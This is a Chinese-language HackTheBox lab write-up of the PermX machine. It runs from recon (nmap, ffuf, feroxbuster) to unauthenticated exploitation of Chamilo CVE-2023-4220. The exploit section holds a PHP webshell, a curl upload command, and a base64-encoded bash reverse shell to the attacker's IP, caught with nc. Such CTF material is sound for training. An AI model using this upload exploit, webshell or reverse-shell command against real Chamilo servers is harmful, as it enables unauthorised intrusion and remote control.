[HackTheBox] PermX – Easy – WP

机器信息

• 系统 Linux
• 难度 Easy

WP

信息收集

nmap扫描发现两个开放的TCP端口，SSH(22) 和HTTP(80)

root@kali$ nmap -p- --min-rate 10000 10.10.11.23
Starting Nmap 7.80 ( https://nmap.org ) at 2024-07-06 21:38 EDT
Nmap scan report for 10.10.11.23
Host is up (0.087s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 6.90 seconds
oxdf@hacky$ nmap -p 22,80 -sCV 10.10.11.23
Starting Nmap 7.80 ( https://nmap.org ) at 2024-07-06 21:38 EDT
Nmap scan report for 10.10.11.23
Host is up (0.087s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://permx.htb
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.82 seconds

通过nmap --script vuln漏洞扫描并未直接扫描到任何有效信息

根据OpenSSH和Apache版本，主机系统可能为 Ubuntu 22.04 jammy。

访问80端口状态码302重定向到permx.htb

子域名模糊测试

这里我使用ffuf进行模糊测试子域名发现

root@kali$ ffuf -u http://10.10.11.23 -H "Host: FUZZ.permx.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -ac

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.23
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.permx.htb
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

www                     [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 88ms]
lms                     [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 122ms]
:: Progress: [19966/19966] :: Job [1/1] :: 458 req/sec :: Duration: [0:00:45] :: Errors: 0 ::

将发现的结果添加至本地host解析

vim /etc/hosts

10.10.11.23 permx.htb www.permx.htb lms.permx.htb

Web – 80端口

WWW

www.permx.htb与permx.htb响应结果一致

root@kali$ curl -s permx.htb | wc 
    586    2466   36182
root@kali$ curl -s www.permx.htb | wc 
    586    2466   36182
root@kali$ curl -s permx.htb | md5sum
71646e5bbcf317ff2aea64b6be02b1dc  -
root@kali$ curl -s www.permx.htb | md5sum
71646e5bbcf317ff2aea64b6be02b1dc  -

先假设他们解析到相同的目录

站点

该站点看起来像是一个电子学习平台

大部分页面都是静态页面，这里没什么值得关注的

技术栈

几乎纯静态

404页面为默认的Apache 404

目录暴破

这里使用feroxbuster进行测试，几乎不需要额外的配置，因为站点为纯静态这里使用-x html参数

root@kali$ feroxbuster -u http://permx.htb -x html --dont-extract-links
                                                                                                                      
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://permx.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💲  Extensions            │ [html]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      271c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      303c http://permx.htb/js => http://permx.htb/js/
301      GET        9l       28w      304c http://permx.htb/css => http://permx.htb/css/
301      GET        9l       28w      304c http://permx.htb/img => http://permx.htb/img/
200      GET      587l     2466w    36182c http://permx.htb/
301      GET        9l       28w      304c http://permx.htb/lib => http://permx.htb/lib/
200      GET      275l      899w    14753c http://permx.htb/contact.html
200      GET      367l     1362w    20542c http://permx.htb/about.html
200      GET      208l      701w    10428c http://permx.htb/404.html
[####################] - 2m    150000/150000  0s      found:12      errors:0      
[####################] - 2m     30000/30000   294/s   http://permx.htb/ 
[####################] - 0s     30000/30000   348837/s http://permx.htb/js/ => Directory listing (add --scan-dir-listings to scan) (remove --dont-extract-links to scan)
[####################] - 0s     30000/30000   344828/s http://permx.htb/css/ => Directory listing (add --scan-dir-listings to scan) (remove --dont-extract-links to scan)
[####################] - 0s     30000/30000   340909/s http://permx.htb/img/ => Directory listing (add --scan-dir-listings to scan) (remove --dont-extract-links to scan)
[####################] - 0s     30000/30000   348837/s http://permx.htb/lib/ => Directory listing (add --scan-dir-listings to scan) (remove --dont-extract-links to scan)

遗憾的是没有任何值得关注的内容

lms.permx.htb

其他子域名站点

此站点提供了一个由Chamilo构建的登录页面

从Github得知此应用更新到2.0是一个很大的更新

这里发现信息泄露 http://lms.permx.htb/README.md 可以下载

root@kali$ wget lms.permx.htb/README.md
--2024-07-06 22:31:33--  http://lms.permx.htb/README.md
Resolving lms.permx.htb (lms.permx.htb)... 10.10.11.23
Connecting to lms.permx.htb (lms.permx.htb)|10.10.11.23|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8074 (7.9K) [text/markdown]
Saving to: ‘README.md’

README.md                           100%[=================================================================>]   7.88K  --.-KB/s    in 0s      

2024-07-06 22:31:33 (789 MB/s) - ‘README.md’ saved [8074/8074]
oxdf@hacky$ cat README.md
# Chamilo 1.11.x

![PHP Composer](https://github.com/chamilo/chamilo-lms/workflows/PHP%20Composer/badge.svg?branch=1.11.x)
[![Scrutinizer Code Quality](https://scrutinizer-ci.com/g/chamilo/chamilo-lms/badges/quality-score.png?b=1.11.x)](https://scrutinizer-ci.com/g/chamilo/chamilo-lms/?branch=1.11.x)
[![Bountysource](https://www.bountysource.com/badge/team?team_id=12439&style=raised)](https://www.bountysource.com/teams/chamilo?utm_source=chamilo&utm_medium=shield&utm_campaign=raised)
[![Code Consistency](https://squizlabs.github.io/PHP_CodeSniffer/analysis/chamilo/chamilo-lms/grade.svg)](http://squizlabs.github.io/PHP_CodeSniffer/analysis/chamilo/chamilo-lms/)
[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/166/badge)](https://bestpractices.coreinfrastructure.org/projects/166)
[![Codacy Badge](https://api.codacy.com/project/badge/Grade/88e934aab2f34bb7a0397a6f62b078b2)](https://www.codacy.com/app/chamilo/chamilo-lms?utm_source=github.com&utm_medium=referral&utm_content=chamilo/chamilo-lms&utm_campaign=badger)

## Installation

This installation guide is for development environments only.

### Install PHP, a web server and MySQL/MariaDB

To run Chamilo, you will need at least a web server (we recommend Apache2 for commodity reasons), a database server (we recommend MariaDB but will explain MySQL for commodity reasons) and a PHP interpreter (and a series of libraries for it). If you are working on a Debian-based system (Debian, Ubuntu, Mint, etc), just
type
‍```
sudo apt-get install apache2 mysql-server php libapache2-mod-php php-gd php-intl php-curl php-json php-mysql php-zip composer
‍```

### Install Git

The development version 1.11.x requires you to have Git installed. If you are working on a Debian-based system (Debian, Ubuntu, Mint, etc), just type
‍```
sudo apt-get install git
‍```

### Install Composer

To run the development version 1.11.x, you need Composer, a libraries dependency management system that will update all the libraries you need for Chamilo to the latest available version.

Make sure you have Composer installed. If you do, you should be able to launch "composer" on the command line and have the inline help of composer show a few subcommands. If you don't, please follow the installation guide at https://getcomposer.org/download/

### Download Chamilo from GitHub

Clone the repository

‍```
sudo mkdir chamilo-1.11
sudo chown -R `whoami` chamilo-1.11
git clone -b 1.11.x --single-branch https://github.com/chamilo/chamilo-lms.git chamilo-1.11
‍```

Checkout branch 1.11.x

‍```
cd chamilo-1.11
git checkout --track origin/1.11.x
git config --global push.default current
‍```

### Update dependencies using Composer

From the Chamilo folder (in which you should be now if you followed the previous steps), launch:

‍```
composer update
‍```

If you face issues related to missing JS libraries, you might need to ensure
that your web/assets folder is completely re-generated.
Use this set of commands to do that:
‍```
rm composer.lock
rm -rf web/ vendor/
composer clear-cache
composer update
‍```
This will take several minutes in the best case scenario, but should definitely
generate the missing files.

### Change permissions

On a Debian-based system, launch:
‍```
sudo chown -R www-data:www-data app main/default_course_document/images main/lang web
‍```

### Configure the web server

Enable the Apache web server module "rewrite" :
‍```
sudo a2enmod rewrite
sudo systemctl restart apache2.service
‍```

Chamilo's .htaccess must be obeyed.
Create /etc/apache2/conf-available/htaccessForChamilo.conf with these lines :
‍```
<Directory /var/www/html/chamilo-lms>
        AllowOverride All
</Directory>
‍```

then enable it :
‍```
sudo a2enconf htaccessForChamilo
sudo systemctl reload apache2.service
‍```

If you just installed missing PHP extensions using apt, you must restart the web server to get them loaded :
‍```
sudo systemctl restart apache2.service
‍```

### Start the installer

In your browser, load the Chamilo URL. You should be automatically redirected
to the installer. If not, add the "main/install/index.php" suffix manually in
your browser address bar. The rest should be a matter of simple
 OK > Next > OK > Next...

## Upgrade from 1.10.x

1.11.0 is a major version. It contains a series of new features, that
also mean a series of new database changes in regards with versions 1.10.x. As
such, it is necessary to go through an upgrade procedure when upgrading from
1.10.x to 1.11.x.

The upgrade procedure is relatively straightforward. If you have a 1.10.x
initially installed with Git, here are the steps you should follow
(considering you are already inside the Chamilo folder):
‍```
git fetch --all
git checkout origin 1.11.x
‍```

Then load the Chamilo URL in your browser, adding "main/install/index.php" and
follow the upgrade instructions. Select the "Upgrade from 1.10.x" button to
proceed.

If you have previously updated database rows manually, you might face issue with
FOREIGN KEYS during the upgrade process. Please make sure your database is
consistent before upgrading. This usually means making sure that you have to delete
rows from tables referring to rows which have been deleted from the user or access_url tables.
Typically:
<pre>
    DELETE FROM access_url_rel_course WHERE access_url_id NOT IN (SELECT id FROM access_url);
</pre>

### Upgrading from non-Git Chamilo 1.10 ###

In the *very unlikely* case of upgrading a "normal" Chamilo 1.10 installation (done with the downloadable zip package) to a Git-based installation, make sure you delete the contents of a few folders first. These folders are re-generated later by the ```composer update``` command. This is likely to increase the downtime of your Chamilo portal of a few additional minutes (plan for 10 minutes on a reasonable internet connection).

‍```
rm composer.lock
rm -rf web/*
rm -rf vendor/*
‍```


# For developers and testers only

This section is for developers only (or for people who have a good reason to use
a development version of Chamilo), in the sense that other people will not
need to update their Chamilo portal as described here.

## Updating code

To update your code with the latest developments in the 1.11.x branch, go to
your Chamilo folder and type:
‍```
git pull origin 1.11.x
‍```
If you have made customizations to your code before the update, you will have
two options:
- abandon your changes (use "git stash" to do that)
- commit your changes locally and merge (use "git commit" and then "git pull")

You are supposed to have a reasonable understanding of Git in order to
use Chamilo as a developer, so if you feel lost, please check the Git manual
first: http://git-scm.com/documentation

## Updating your database from new code

Since the 2015-05-27, Chamilo offers the possibility to make partial database
upgrades through Doctrine migrations.

To update your database to the latest version, go to your Chamilo root folder
and type
‍```
php bin/doctrine.php migrations:migrate --configuration=app/config/migrations.yml
‍```

If you want to proceed with a single migration "step" (the steps reside in
src/Chamilo/CoreBundle/Migrations/Schema/V110/), then check the datetime of the
version and type the following (assuming you want to execute Version20150527120703)
‍```
php bin/doctrine.php migrations:execute 20150527120703 --up --configuration=app/config/migrations.yml
‍```

You can also print the differences between your database and what it should be by issuing the following command from the Chamilo base folder:
‍```
php bin/doctrine.php orm:schema-tool:update --dump-sql
‍```

## Contributing

If you want to submit new features or patches to Chamilo, please follow the
Github contribution guide https://guides.github.com/activities/contributing-to-open-source/
and our CONTRIBUTING.md file.
In short, we ask you to send us Pull Requests based on a branch that you create
with this purpose into your repository forked from the original Chamilo repository.

# Documentation
For more information on Chamilo, visit https://1.11.chamilo.org/documentation/index.html

多次提到1.11.x版本

我将返回到Github并选择此版本

在根目录下有一个documentation目录

发现安装的版本可能是1.11.24

立足点

初始访问 – 获得www-data Shell

识别CVE

搜索”chamilo vuln”会返回几个CVE编号

这里存在一个不需要身份验证的CVE

漏洞利用

CVE-2023-4220

背景

它是空的，现在我来写入PHP Webshell。

<?php system($_REQUEST['cmd']); ?>

现在我通过curl构建请求写入这个文件

root@kali$ curl -F '[email protected]' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.

现在我创建一个Base64编码后的Bash反弹Shell

root@kali$ echo 'bash  -c "bash -i >& /dev/tcp/10.10.14.6/443 0>&1"' | base64 -w0
YmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNi80NDMgMD4mMSIK

执行

root@kali$ curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/shell.php?cmd=echo+YmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNi80NDMgMD4mMSIK|base64+-d|bash'

配置nc监听我们将获得一个反弹Shell

root@kali$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.23 44392
bash: cannot set terminal process group (1168): Inappropriate ioctl for device
bash: no job control in this shell
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$

权限提升

权限提升部分我会放在下一篇文章继续。

能看到这里你已经超越了80%的人